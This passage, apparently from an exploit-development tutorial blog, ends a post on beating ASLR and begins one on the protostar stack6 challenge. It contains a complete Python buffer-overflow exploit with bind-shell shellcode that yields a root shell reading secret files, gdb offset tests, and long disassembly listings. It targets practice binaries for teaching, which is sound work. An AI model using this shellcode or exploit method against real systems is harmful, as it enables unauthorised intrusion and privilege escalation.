PTR [ebp+0x8]/span/span span class="code-line"span class="x" 8048d51: 89 04 24 mov DWORD PTR [esp],eax/span/span span class="code-line"span class="x" 8048d54: ff 94 b3 00 ff ff ff call DWORD PTR [ebx+esi*4-0x100]/span/span span class="code-line"span class="x" 8048d5b: 83 c6 01 add esi,0x1/span/span span class="code-line"span class="x" 8048d5e: 39 fe cmp esi,edi/span/span span class="code-line"span class="x" 8048d60: 72 de jb 8048d40 lt;__libc_csu_init+0x30gt;/span/span span class="code-line"span class="x" 8048d62: 83 c4 1c add esp,0x1c/span/span span class="code-line"span class="x" 8048d65: 5b pop ebx/span/span span class="code-line"span class="x" 8048d66: 5e pop esi/span/span span class="code-line"span class="x" 8048d67: 5f pop edi/span/span span class="code-line"span class="x" 8048d68: 5d pop ebp/span/span span class="code-line"span class="x" 8048d69: c3 ret /span/span span class="code-line"/span span class="code-line"span class="mh"08048d6a/spanspan class="w" /spanspan class="p"lt;/spanspan class="nf"__i686.get_pc_thunk.bx/spanspan class="p"gt;:/span/span span class="code-line"span class="x" 8048d6a: 8b 1c 24 mov ebx,DWORD PTR [esp]/span/span span class="code-line"span class="x" 8048d6d: c3 ret /span/span span class="code-line"span class="x" 8048d6e: 90 nop/span/span span class="code-line"span class="x" 8048d6f: 90 nop/span/span span class="code-line"/span span class="code-line"Disassembly of section span class="nl".fini/spanspan class="p":/span/span span class="code-line"/span span class="code-line"span class="mh"08048d70/spanspan class="w" /spanspan class="p"lt;/spanspan class="nf"_fini/spanspan class="p"gt;:/span/span span class="code-line"span class="x" 8048d70: 55 push ebp/span/span span class="code-line"span class="x" 8048d71: 89 e5 mov ebp,esp/span/span span class="code-line"span class="x" 8048d73: 53 push ebx/span/span span class="code-line"span class="x" 8048d74: 83 ec 04 sub esp,0x4/span/span span class="code-line"span class="x" 8048d77: e8 00 00 00 00 call 8048d7c lt;_fini+0xcgt;/span/span span class="code-line"span class="x" 8048d7c: 5b pop ebx/span/span span class="code-line"span class="x" 8048d7d: 81 c3 84 03 00 00 add ebx,0x384/span/span span class="code-line"span class="x" 8048d83: 59 pop ecx/span/span span class="code-line"span class="x" 8048d84: 5b pop ebx/span/span span class="code-line"span class="x" 8048d85: c9 leave /span/span span class="code-line"span class="x" 8048d86: c3 ret/span/span span class="code-line"/code/pre/div /td/tr/table pThere aren't any codejmp esp/code's there, you can use grep to make it a little easier to go through:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal" 1/span/span span class="code-line"span class="normal" 2/span/span span class="code-line"span class="normal" 3/span/span span class="code-line"span class="normal" 4/span/span span class="code-line"span class="normal" 5/span/span span class="code-line"span class="normal" 6/span/span span class="code-line"span class="normal" 7/span/span span class="code-line"span class="normal" 8/span/span span class="code-line"span class="normal" 9/span/span span class="code-line"span class="normal"10/span/span span class="code-line"span class="normal"11/span/span span class="code-line"span class="normal"12/span/span span class="code-line"span class="normal"13/span/span span class="code-line"span class="normal"14/span/span span class="code-line"span class="normal"15/span/span span class="code-line"span class="normal"16/span/span span class="code-line"span class="normal"17/span/span span class="code-line"span class="normal"18/span/span span class="code-line"span class="normal"19/span/span span class="code-line"span class="normal"20/span/span span class="code-line"span class="normal"21/span/span span class="code-line"span class="normal"22/span/span span class="code-line"span class="normal"23/span/span span class="code-line"span class="normal"24/span/span span class="code-line"span class="normal"25/span/span span class="code-line"span class="normal"26/span/span span class="code-line"span class="normal"27/span/span span class="code-line"span class="normal"28/span/span span class="code-line"span class="normal"29/span/span span class="code-line"span class="normal"30/span/span span class="code-line"span class="normal"31/span/span span class="code-line"span class="normal"32/span/span span class="code-line"span class="normal"33/span/span span class="code-line"span class="normal"34/span/span span class="code-line"span class="normal"35/span/span span class="code-line"span class="normal"36/span/span span class="code-line"span class="normal"37/span/span span class="code-line"span class="normal"38/span/span span class="code-line"span class="normal"39/span/span span class="code-line"span class="normal"40/span/span span class="code-line"span class="normal"41/span/span span class="code-line"span class="normal"42/span/span span class="code-line"span class="normal"43/span/span span class="code-line"span class="normal"44/span/span span class="code-line"span class="normal"45/span/span span class="code-line"span class="normal"46/span/span span class="code-line"span class="normal"47/span/span span class="code-line"span class="normal"48/span/span span class="code-line"span class="normal"49/span/span span class="code-line"span class="normal"50/span/span span class="code-line"span class="normal"51/span/span span class="code-line"span class="normal"52/span/span span class="code-line"span class="normal"53/span/span span class="code-line"span class="normal"54/span/span span class="code-line"span class="normal"55/span/span span class="code-line"span class="normal"56/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"appuser@dev:~$ /spanobjdump -d ./app-net -M intel span class="p"|/span grep jmp/span span class="code-line"span class="go" 8048616: ff 25 08 91 04 08 jmp DWORD PTR ds:0x8049108/span/span span class="code-line"span class="go" 8048620: ff 25 0c 91 04 08 jmp DWORD PTR ds:0x804910c/span/span span class="code-line"span class="go" 804862b: e9 e0 ff ff ff jmp 8048610 lt;_init+0x30gt;/span/span span class="code-line"span class="go" 8048630: ff 25 10 91 04 08 jmp DWORD PTR ds:0x8049110/span/span span class="code-line"span class="go" 804863b: e9 d0 ff ff ff jmp 8048610 lt;_init+0x30gt;/span/span span class="code-line"span class="go" 8048640: ff 25 14 91 04 08 jmp DWORD PTR ds:0x8049114/span/span span class="code-line"span class="go" 804864b: e9 c0 ff ff ff jmp 8048610 lt;_init+0x30gt;/span/span span class="code-line"span class="go" 8048650: ff 25 18 91 04 08 jmp DWORD PTR ds:0x8049118/span/span span class="code-line"span class="go" 804865b: e9 b0 ff ff ff jmp 8048610 lt;_init+0x30gt;/span/span span class="code-line"span class="go" 8048660: ff 25 1c 91 04 08 jmp DWORD PTR ds:0x804911c/span/span span class="code-line"span class="go" 804866b: e9 a0 ff ff ff jmp 8048610 lt;_init+0x30gt;/span/span span class="code-line"span class="go" 8048670: ff 25 20 91 04 08 jmp DWORD PTR ds:0x8049120/span/span span class="code-line"span class="go" 804867b: e9 90 ff ff ff jmp 8048610 lt;_init+0x30gt;/span/span span class="code-line"span class="go" 8048680: ff 25 24 91 04 08 jmp DWORD PTR ds:0x8049124/span/span span class="code-line"span class="go" 804868b: e9 80 ff ff ff jmp 8048610 lt;_init+0x30gt;/span/span span class="code-line"span class="go" 8048690: ff 25 28 91 04 08 jmp DWORD PTR ds:0x8049128/span/span span class="code-line"span class="go" 804869b: e9 70 ff ff ff jmp 8048610 lt;_init+0x30gt;/span/span span class="code-line"span class="go" 80486a0: ff 25 2c 91 04 08 jmp DWORD PTR ds:0x804912c/span/span span class="code-line"span class="go" 80486ab: e9 60 ff ff ff jmp 8048610 lt;_init+0x30gt;/span/span span class="code-line"span class="go" 80486b0: ff 25 30 91 04 08 jmp DWORD PTR ds:0x8049130/span/span span class="code-line"span class="go" 80486bb: e9 50 ff ff ff jmp 8048610 lt;_init+0x30gt;/span/span span class="code-line"span class="go" 80486c0: ff 25 34 91 04 08 jmp DWORD PTR ds:0x8049134/span/span span class="code-line"span class="go" 80486cb: e9 40 ff ff ff jmp 8048610 lt;_init+0x30gt;/span/span span class="code-line"span class="go" 80486d0: ff 25 38 91 04 08 jmp DWORD PTR ds:0x8049138/span/span span class="code-line"span class="go" 80486db: e9 30 ff ff ff jmp 8048610 lt;_init+0x30gt;/span/span span class="code-line"span class="go" 80486e0: ff 25 3c 91 04 08 jmp DWORD PTR ds:0x804913c/span/span span class="code-line"span class="go" 80486eb: e9 20 ff ff ff jmp 8048610 lt;_init+0x30gt;/span/span span class="code-line"span class="go" 80486f0: ff 25 40 91 04 08 jmp DWORD PTR ds:0x8049140/span/span span class="code-line"span class="go" 80486fb: e9 10 ff ff ff jmp 8048610 lt;_init+0x30gt;/span/span span class="code-line"span class="go" 8048700: ff 25 44 91 04 08 jmp DWORD PTR ds:0x8049144/span/span span class="code-line"span class="go" 804870b: e9 00 ff ff ff jmp 8048610 lt;_init+0x30gt;/span/span span class="code-line"span class="go" 8048710: ff 25 48 91 04 08 jmp DWORD PTR ds:0x8049148/span/span span class="code-line"span class="go" 804871b: e9 f0 fe ff ff jmp 8048610 lt;_init+0x30gt;/span/span span class="code-line"span class="go" 8048720: ff 25 4c 91 04 08 jmp DWORD PTR ds:0x804914c/span/span span class="code-line"span class="go" 804872b: e9 e0 fe ff ff jmp 8048610 lt;_init+0x30gt;/span/span span class="code-line"span class="go" 8048730: ff 25 50 91 04 08 jmp DWORD PTR ds:0x8049150/span/span span class="code-line"span class="go" 804873b: e9 d0 fe ff ff jmp 8048610 lt;_init+0x30gt;/span/span span class="code-line"span class="go" 8048740: ff 25 54 91 04 08 jmp DWORD PTR ds:0x8049154/span/span span class="code-line"span class="go" 804874b: e9 c0 fe ff ff jmp 8048610 lt;_init+0x30gt;/span/span span class="code-line"span class="go" 8048750: ff 25 58 91 04 08 jmp DWORD PTR ds:0x8049158/span/span span class="code-line"span class="go" 804875b: e9 b0 fe ff ff jmp 8048610 lt;_init+0x30gt;/span/span span class="code-line"span class="go" 8048760: ff 25 5c 91 04 08 jmp DWORD PTR ds:0x804915c/span/span span class="code-line"span class="go" 804876b: e9 a0 fe ff ff jmp 8048610 lt;_init+0x30gt;/span/span span class="code-line"span class="go" 8048770: ff 25 60 91 04 08 jmp DWORD PTR ds:0x8049160/span/span span class="code-line"span class="go" 804877b: e9 90 fe ff ff jmp 8048610 lt;_init+0x30gt;/span/span span class="code-line"span class="go" 8048862: e9 79 ff ff ff jmp 80487e0 lt;register_tm_clonesgt;/span/span span class="code-line"span class="go" 8048867: e9 74 ff ff ff jmp 80487e0 lt;register_tm_clonesgt;/span/span span class="code-line"span class="go" 8048a46: eb 78 jmp 8048ac0 lt;main+0x254gt;/span/span span class="code-line"span class="go" 8048a83: eb 3b jmp 8048ac0 lt;main+0x254gt;/span/span span class="code-line"span class="go" 8048aef: e9 59 fe ff ff jmp 804894d lt;main+0xe1gt;/span/span span class="code-line"span class="go" 8048b17: eb 31 jmp 8048b4a lt;sendfile+0x56gt;/span/span span class="code-line"span class="go" 8048b6b: eb 18 jmp 8048b85 lt;sendfile+0x91gt;/span/span span class="code-line"span class="go" 8048c1c: eb 31 jmp 8048c4f lt;sendtoken+0x56gt;/span/span span class="code-line"span class="go" 8048c70: eb 18 jmp 8048c8a lt;sendtoken+0x91gt;/span/span span class="code-line"span class="go" 8048cdd: eb 19 jmp 8048cf8 lt;checkpass+0x6cgt;/span/span span class="code-line"/code/pre/div /td/tr/table pHowever, we do have another option. codeobjdump/code shows the instructions as they would be run by the processor during normal operations, you don't necessarily have to use them this way, you can instead start execution in the middle of an instruction to create a new instruction./p pThis is what we are going to try to do (this was the reason for the extra check in the application too, as you will see)./p pFirst we need to figure out what a href="https://en.wikipedia.org/wiki/Opcode" target="_blank"opcodes/a codejmp esp/code results in, we start by creating a simple assembly application with just codejmp esp/code in it:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/span span class="code-line"span class="normal"2/span/span span class="code-line"span class="normal"3/span/span span class="code-line"span class="normal"4/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="k"global/spanspan class="w" /spanspan class="nv"_start/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="nl"_start:/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="nf"jmp/spanspan class="w" /spanspan class="nb"esp/spanspan class="w"/span/span span class="code-line"/code/pre/div /td/tr/table pNow we need to assemble and link it; and then disassemble it with codeobjdump/code:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal" 1/span/span span class="code-line"span class="normal" 2/span/span span class="code-line"span class="normal" 3/span/span span class="code-line"span class="normal" 4/span/span span class="code-line"span class="normal" 5/span/span span class="code-line"span class="normal" 6/span/span span class="code-line"span class="normal" 7/span/span span class="code-line"span class="normal" 8/span/span span class="code-line"span class="normal" 9/span/span span class="code-line"span class="normal"10/span/span span class="code-line"span class="normal"11/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"appuser@dev:~$ /spannasm -f elf32 -o jesp.o jesp.nasm /span span class="code-line"span class="gp"appuser@dev:~$ /spanld -o jesp jesp.o/span span class="code-line"span class="gp"appuser@dev:~$ /spanobjdump -d ./jesp -M intel/span span class="code-line"/span span class="code-line"span class="go"./jesp: file format elf32-i386/span/span span class="code-line"/span span class="code-line"/span span class="code-line"span class="go"Disassembly of section .text:/span/span span class="code-line"/span span class="code-line"span class="go"08048060 lt;_startgt;:/span/span span class="code-line"span class="go" 8048060: ff e4 jmp esp/span/span span class="code-line"/code/pre/div /td/tr/table pSo all we need to do is find codeff e4/code anywhere in the application code. A quick grep find us an instruction that contains this sequence:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/span span class="code-line"span class="normal"2/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"appuser@dev:~$ /spanobjdump -d ./app-net -M intel span class="p"|/span grep span class="s1"#39;ff e4#39;/span/span span class="code-line"span class="go" 8048ccd: 81 7d f0 ff e4 00 00 cmp DWORD PTR [ebp-0x10],0xe4ff/span/span span class="code-line"/code/pre/div /td/tr/table pThis is the compare to code58623/code on line 104 of the source code above, code58623/code is actually codee4ff/code in hex and its stored as codeff e4/code because we are using a a href="https://en.wikipedia.org/wiki/Endianness#Little-endian" target="_blank"little endian/a system./p pThe start of this instruction is at the memory address code08048ccd/code and our codejmp esp/code is 3 bytes in, so just plus 3 to code08048ccd/code and we get code08048cd0/code. This is the address we will overwrite the return address with./p h2Exploiting The App/h2 pUsing all of the information we've retrieved so far we can build our exploit:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal" 1/span/span span class="code-line"span class="normal" 2/span/span span class="code-line"span class="normal" 3/span/span span class="code-line"span class="normal" 4/span/span span class="code-line"span class="normal" 5/span/span span class="code-line"span class="normal" 6/span/span span class="code-line"span class="normal" 7/span/span span class="code-line"span class="normal" 8/span/span span class="code-line"span class="normal" 9/span/span span class="code-line"span class="normal"10/span/span span class="code-line"span class="normal"11/span/span span class="code-line"span class="normal"12/span/span span class="code-line"span class="normal"13/span/span span class="code-line"span class="normal"14/span/span span class="code-line"span class="normal"15/span/span span class="code-line"span class="normal"16/span/span span class="code-line"span class="normal"17/span/span span class="code-line"span class="normal"18/span/span span class="code-line"span class="normal"19/span/span span class="code-line"span class="normal"20/span/span span class="code-line"span class="normal"21/span/span span class="code-line"span class="normal"22/span/span span class="code-line"span class="normal"23/span/span span class="code-line"span class="normal"24/span/span span class="code-line"span class="normal"25/span/span span class="code-line"span class="normal"26/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="ch"#!/usr/bin/env python/span/span span class="code-line"/span span class="code-line"span class="kn"import/span span class="nn"socket/span/span span class="code-line"/span span class="code-line"span class="n"shellcode/span span class="o"=/span span class="s2"quot;/spanspan class="se"\x31\xc0\x31\xdb\x31\xc9\x31\xd2\xb0\x17\x31\xdb\xcd\x80\x89\xd8\xb0\x66\xb3\x01\x51\x6a\x01\x6a\x02\x89\xe1\xcd\x80\x89\xc6\xb0\x66\xb3\x02\x52\x66\x68\x27\x0e\x66\x53\x89\xe1\x6a\x10\x51\x56\x89\xe1\xcd\x80\xb0\x66\xb3\x04\x6a\x01\x56\x89\xe1\xcd\x80\xb0\x66\xb3\x05\x52\x52\x56\x89\xe1\xcd\x80\x89\xc3\x31\xc9\xb1\x03\xfe\xc9\xb0\x3f\xcd\x80\x75\xf8\x31\xc0\x52\x68\x62\x61\x73\x68\x68\x62\x69\x6e\x2f\x68\x2f\x2f\x2f\x2f\x89\xe3\x52\x53\x89\xe1\x52\x89\xe2\xb0\x0b\xcd\x80/spanspan class="s2"quot;/span/span span class="code-line"/span span class="code-line"span class="n"payload/span span class="o"=/span span class="s2"quot;Aquot;/span span class="o"*/span span class="mi"532/span/span span class="code-line"/span span class="code-line"span class="n"payload/span span class="o"+=/span span class="s2"quot;/spanspan class="se"\xd0\x8c\x04\x08/spanspan class="s2"quot;/span span class="c1"# the address of our 0xff 0xe4/span/span span class="code-line" span class="c1"# in reverse (little endian)/span/span span class="code-line"/span span class="code-line"span class="n"payload/span span class="o"+=/span span class="s2"quot;/spanspan class="se"\x90/spanspan class="s2"quot;/span span class="o"*/span span class="mi"20/span span class="c1"# nop sled/span/span span class="code-line"/span span class="code-line"span class="n"payload/span span class="o"+=/span span class="n"shellcode/span span class="c1"# append our shellcode/span/span span class="code-line"/span span class="code-line"span class="c1"# create the tcp socket/span/span span class="code-line"span class="n"s/span span class="o"=/span span class="n"socket/spanspan class="o"./spanspan class="n"socket/spanspan class="p"(/spanspan class="n"socket/spanspan class="o"./spanspan class="n"AF_INET/spanspan class="p",/span span class="n"socket/spanspan class="o"./spanspan class="n"SOCK_STREAM/spanspan class="p")/span/span span class="code-line"/span span class="code-line"span class="c1"# connect to 127.0.0.1 port 9999/span/span span class="code-line"span class="n"s/spanspan class="o"./spanspan class="n"connect/spanspan class="p"((/spanspan class="s2"quot;127.0.0.1quot;/spanspan class="p",/span span class="mi"9999/spanspan class="p"))/span/span span class="code-line"/span span class="code-line"span class="c1"# send our payload/span/span span class="code-line"span class="n"s/spanspan class="o"./spanspan class="n"send/spanspan class="p"(/spanspan class="n"payload/spanspan class="p")/span/span span class="code-line"/span span class="code-line"span class="c1"# close the socket/span/span span class="code-line"span class="n"s/spanspan class="o"./spanspan class="n"close/spanspan class="p"()/span/span span class="code-line"/code/pre/div /td/tr/table pThe only changes here are, before we overwrite the return address we only send codeA/code's (532 of them, 528 for the local variables and 4 for the saved EBP), then we put our return address (the address of codejmp esp/code strong08048cd0/strong) and lastly we stick our a href="https://en.wikipedia.org/wiki/NOP_slide" target="_blank"NOP sled/a and shellcode (the NOP sled isn't actually needed though as we know ESP will point to the start of our code)./p pWe can now exploit the application, first run the app again:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"appuser@dev:~$ /span./app-net/span span class="code-line"/code/pre/div /td/tr/table pNow launch the exploit and connect to our shell:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal" 1/span/span span class="code-line"span class="normal" 2/span/span span class="code-line"span class="normal" 3/span/span span class="code-line"span class="normal" 4/span/span span class="code-line"span class="normal" 5/span/span span class="code-line"span class="normal" 6/span/span span class="code-line"span class="normal" 7/span/span span class="code-line"span class="normal" 8/span/span span class="code-line"span class="normal" 9/span/span span class="code-line"span class="normal"10/span/span span class="code-line"span class="normal"11/span/span span class="code-line"span class="normal"12/span/span span class="code-line"span class="normal"13/span/span span class="code-line"span class="normal"14/span/span span class="code-line"span class="normal"15/span/span span class="code-line"span class="normal"16/span/span span class="code-line"span class="normal"17/span/span span class="code-line"span class="normal"18/span/span span class="code-line"span class="normal"19/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"testuser@dev:~$ /spanpython app-net-exploit2.py /span span class="code-line"span class="gp"testuser@dev:~$ /spannc span class="m"127/span.0.0.1 span class="m"9998/span/span span class="code-line"span class="go"pwd/span/span span class="code-line"span class="go"/home/appuser/span/span span class="code-line"span class="go"whoami/span/span span class="code-line"span class="go"root/span/span span class="code-line"span class="go"ls -l/span/span span class="code-line"span class="go"total 32/span/span span class="code-line"span class="go"-rwsr-xr-x 1 root root 8431 Jul 7 22:01 app-net/span/span span class="code-line"span class="go"-rwxr-xr-x 1 appuser appuser 486 Jul 8 11:16 jesp/span/span span class="code-line"span class="go"-rw-r--r-- 1 appuser appuser 32 Jul 8 11:08 jesp.nasm/span/span span class="code-line"span class="go"-rw-r--r-- 1 appuser appuser 432 Jul 8 11:16 jesp.o/span/span span class="code-line"span class="go"-rw------- 1 root root 93 Jul 7 22:02 secret.txt/span/span span class="code-line"span class="go"-rw------- 1 root root 29 Jul 7 22:03 token/span/span span class="code-line"span class="go"cat token/span/span span class="code-line"span class="go"084934-3492048234728-4847847/span/span span class="code-line"span class="go"cat secret.txt/span/span span class="code-line"span class="go"This is a top secret file!/span/span span class="code-line"span class="go"Only people with the password should be able to view this file!/span/span span class="code-line"/code/pre/div /td/tr/table pPWNED!! :-)/p h2Conclusion/h2 pWhile ASLR makes it more difficult to exploit a vulnerability, it doesn't make it impossible. You do, however, need to understand how the stack works more than if ASLR is disabled./p pAlso, if you need to use instructions from inside the application code, you aren't restricted to the normal instructions executed by the application at runtime. You can jump into the middle of an instruction to create an entirely new instruction to run./p pThis idea of using bits of instructions (or gadgets) is the beginning of a href="https://en.wikipedia.org/wiki/Return-oriented_programming" target="_blank"return-oriented programming ROP/a, which we will use more extensively later./p pHappy Hacking :-)/p

So far, all of our exploits have included shellcode, on most (if not all) modern systems it isn't possible to just run shellcode like this because of NX.

NX disallows running code in certain memory segments, primarily memory segments that contain variable data, like the stack and heap.

A number of techniques were created to beat NX and I want to demostrate 2 of them here, return to libc (Ret2Libc) and return-oriented programming (ROP).

This will be slightly different to my previous posts as I will not be hacking an application that I wrote but instead taking on 2 challenges from the protostar section of exploit exercises.

The challenges that we will look at here are stack6 and stack7.

While these challenges have both NX and ASLR disabled they both implement their own protection which disables the straight running of shellcode.

Stack6: The App

So if you look at the webpage for stack6, it actually gives you the source code:

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31

#include <stdlib.h> #include <unistd.h> #include <stdio.h> #include <string.h> void getpath() { char buffer[64]; unsigned int ret; printf("input path please: "); fflush(stdout); gets(buffer); ret = __builtin_return_address(0); if((ret & 0xbf000000) == 0xbf000000) { printf("bzzzt (%p)\n", ret); _exit(1); } printf("got path %s\n", buffer); } int main(int argc, char **argv) { getpath(); }

The buffer overflow is on line 13, the application then gets the function return address on line 15 and checks it on line 17.

If the return address begins with bf the application exits, stack addresses normally begin with bf so you cannot just overwrite it with an address on the stack.

One other thing to notice here is that the vulnerable line is using the gets function, this function will only stop once it reaches a newline (\n) or end of file (EOF) character so we do not need to avoid null (\0) characters.

Stack6: The Easy Way

While I've written this post to demonstrate Ret2Libc and ROP we can get our shellcode to run on these 2 challenges using the exact same method which I'll explain quickly here.

So our buffer is 64 bytes long, we have the local variable ret which is 4 bytes, then we have the saved EBP from main's stack frame and finally the return address, its worth noting that the stack has to be 16 byte aligned so 8 will need to be added before you get to the return address. So we need to write 64+4+4+8 = 80 bytes before we overwrite the return address and hijack EIP.

Lets test this:

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24

$ bash user@protostar:~$ cd /opt/protostar/bin/ user@protostar:/opt/protostar/bin$ python -c 'print "A"*80' > /tmp/t user@protostar:/opt/protostar/bin$ python -c 'print "A"*84' > /tmp/t2 user@protostar:/opt/protostar/bin$ gdb -q ./stack6 Reading symbols from /opt/protostar/bin/stack6...done. (gdb) r < /tmp/t Starting program: /opt/protostar/bin/stack6 < /tmp/t input path please: got path AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA input path please: got path AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA�AAAAAAAAAAAA� � Program received signal SIGSEGV, Segmentation fault. 0x08048507 in main (argc=Cannot access memory at address 0x41414149 ) at stack6/stack6.c:31 31 stack6/stack6.c: No such file or directory. in stack6/stack6.c (gdb) r < /tmp/t2 The program being debugged has been started already. Start it from the beginning? (y or n) y Starting program: /opt/protostar/bin/stack6 < /tmp/t2 input path please: got path AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA Program received signal SIGSEGV, Segmentation fault. 0x41414141 in ?? ()

So we were correct, we can now test what happens if we write an address beginning with bf:

1 2	user@protostar:/opt/protostar/bin$ python -c 'print "A"*80 + "\x00\x00\x00\xbf"' | ./stack6 input path please: bzzzt (0xbf000000)

As you can see we've hit the printf inside the if statement and exited without seg faulting.

If there was a jmp esp or ff e4 in the application code we could use the same method we used in the beating ASLR post but that isn't the case here.

We can still run our shellcode though using a slightly more complex method, the application is only checking the return address of the current function (note the argument to the __builtin_return_address function call), so we just need to make sure that this address doesn't start with bf.

We'll do this by using 1 ROP "gadget", let's first find the address of our gadget:

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 211 212 213 214 215 216 217 218 219 220 221 222 223 224 225 226 227 228 229 230 231 232 233 234 235 236 237 238 239 240 241 242 243 244 245 246 247 248 249 250 251 252 253 254 255 256 257 258 259 260 261 262 263 264 265 266 267 268 269 270 271 272 273 274 275 276

user@protostar:/opt/protostar/bin$ objdump -d ./stack6 -M intel ./stack6: file format elf32-i386 Disassembly of section .init: 08048330 <_init>: 8048330: 55 push ebp 8048331: 89 e5 mov ebp,esp 8048333: 53 push ebx 8048334: 83 ec 04 sub esp,0x4 8048337: e8 00 00 00 00 call 804833c <_init+0xc> 804833c: 5b pop ebx 804833d: 81 c3 b0 13 00 00 add ebx,0x13b0 8048343: 8b 93 fc ff ff ff mov edx,DWORD PTR [ebx-0x4] 8048349: 85 d2 test edx,edx 804834b: 74 05 je 8048352 <_init+0x22> 804834d: e8 1e 00 00 00 call 8048370 <__gmon_start__@plt> 8048352: e8 09 01 00 00 call 8048460 <frame_dummy> 8048357: e8 24 02 00 00 call 8048580 <__do_global_ctors_aux> 804835c: 58 pop eax 804835d: 5b pop ebx 804835e: c9 leave 804835f: c3 ret Disassembly of section .plt: 08048360 <__gmon_start__@plt-0x10>: 8048360: ff 35 f0 96 04 08 push DWORD PTR ds:0x80496f0 8048366: ff 25 f4 96 04 08 jmp DWORD PTR ds:0x80496f4 804836c: 00 00 add BYTE PTR [eax],al ... 08048370 <__gmon_start__@plt>: 8048370: ff 25 f8 96 04 08 jmp DWORD PTR ds:0x80496f8 8048376: 68 00 00 00 00 push 0x0 804837b: e9 e0 ff ff ff jmp 8048360 <_init+0x30> 08048380 <gets@plt>: 8048380: ff 25 fc 96 04 08 jmp DWORD PTR ds:0x80496fc 8048386: 68 08 00 00 00 push 0x8 804838b: e9 d0 ff ff ff jmp 8048360 <_init+0x30> 08048390 <__libc_start_main@plt>: 8048390: ff 25 00 97 04 08 jmp DWORD PTR ds:0x8049700 8048396: 68 10 00 00 00 push 0x10 804839b: e9 c0 ff ff ff jmp 8048360 <_init+0x30> 080483a0 <_exit@plt>: 80483a0: ff 25 04 97 04 08 jmp DWORD PTR ds:0x8049704 80483a6: 68 18 00 00 00 push 0x18 80483ab: e9 b0 ff ff ff jmp 8048360 <_init+0x30> 080483b0 <fflush@plt>: 80483b0: ff 25 08 97 04 08 jmp DWORD PTR ds:0x8049708 80483b6: 68 20 00 00 00 push 0x20 80483bb: e9 a0 ff ff ff jmp 8048360 <_init+0x30> 080483c0 <printf@plt>: 80483c0: ff 25 0c 97 04 08 jmp DWORD PTR ds:0x804970c 80483c6: 68 28 00 00 00 push 0x28 80483cb: e9 90 ff ff ff jmp 8048360 <_init+0x30> Disassembly of section .text: 080483d0 <_start>: 80483d0: 31 ed xor ebp,ebp 80483d2: 5e pop esi 80483d3: 89 e1 mov ecx,esp 80483d5: 83 e4 f0 and esp,0xfffffff0 80483d8: 50 push eax 80483d9: 54 push esp 80483da: 52 push edx 80483db: 68 10 85 04 08 push 0x8048510 80483e0: 68 20 85 04 08 push 0x8048520 80483e5: 51 push ecx 80483e6: 56 push esi 80483e7: 68 fa 84 04 08 push 0x80484fa 80483ec: e8 9f ff ff ff call 8048390 <__libc_start_main@plt> 80483f1: f4 hlt 80483f2: 90 nop 80483f3: 90 nop 80483f4: 90 nop 80483f5: 90 nop 80483f6: 90 nop 80483f7: 90 nop 80483f8: 90 nop 80483f9: 90 nop 80483fa: 90 nop 80483fb: 90 nop 80483fc: 90 nop 80483fd: 90 nop 80483fe: 90 nop 80483ff: 90 nop 08048400 <__do_global_dtors_aux>: 8048400: 55 push ebp 8048401: 89 e5 mov ebp,esp 8048403: 53 push ebx 8048404: 83 ec 04 sub esp,0x4 8048407: 80 3d 24 97 04 08 00 cmp BYTE PTR ds:0x8049724,0x0 804840e: 75 3f jne 804844f <__do_global_dtors_aux+0x4f> 8048410: a1 28 97 04 08 mov eax,ds:0x8049728 8048415: bb 10 96 04 08 mov ebx,0x8049610 804841a: 81 eb 0c 96 04 08 sub ebx,0x804960c 8048420: c1 fb 02 sar ebx,0x2 8048423: 83 eb 01 sub ebx,0x1 8048426: 39 d8 cmp eax,ebx 8048428: 73 1e jae 8048448 <__do_global_dtors_aux+0x48> 804842a: 8d b6 00 00 00 00 lea esi,[esi+0x0] 8048430: 83 c0 01 add eax,0x1 8048433: a3 28 97 04 08 mov ds:0x8049728,eax 8048438: ff 14 85 0c 96 04 08 call DWORD PTR [eax*4+0x804960c] 804843f: a1 28 97 04 08 mov 